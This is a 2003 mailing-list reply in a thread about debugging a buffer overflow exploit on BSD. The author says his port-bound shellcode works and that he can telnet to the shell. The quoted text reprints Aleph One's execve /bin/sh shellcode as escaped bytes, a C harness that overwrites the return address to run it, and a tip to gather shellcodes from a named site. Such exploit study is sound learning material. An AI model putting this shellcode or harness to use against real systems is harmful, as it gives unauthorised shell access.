Re: sample buffer overflow exploit problem

From: Ganbold (ganbold_at_micom.mng.net)
Date: 09/30/03

  • Next message: Gerardo Richarte: "Re: sample buffer overflow exploit problem"
    Date: Tue, 30 Sep 2003 10:26:35 +0900
    To: "deepcode ." <pondermate@hotmail.com>
    
    

    Deepcode,

    I tested my shellcode by function pointer (tested in Aleph1's code) and it
    works fine without any problem. I can connect to it using telnet.
    Since the shell is bound to the port, I can issue commands.

    If you have time, can you try my codes on your machine?

    Ganbold

    At 07:45 PM 9/29/2003 -0300, you wrote:

    >Indeed, if you believe that the shellcode has the problem, try just
    >testing the shellcode by a function pointer: I ripped this code from Aleph
    >One's Smashing the Stack.
    >
    >char shellcode[] =
    > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    > "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    >
    >void main() {
    > int *ret;
    >
    > ret = (int *)&ret + 2;
    > (*ret) = (int)shellcode;
    >
    >}
    >
    >replace the shellcode and try it out. If it still doesn't work, then grab
    >some new bsd shellcodes. A good site (if it still exists) is
    >http://www.shellcode.com.ar/
    >
    >They have some good shellcodes. Try grabbing as many as you can and
    >checking until u get one that works. If it still doesn't work, then a
    >closer inspection of the code would be in order, I can't quite test
    >myself, BSD doesn't like my hard drive, but I will try this code of yours
    >on debian soon.
    >
    >deepcode
    >

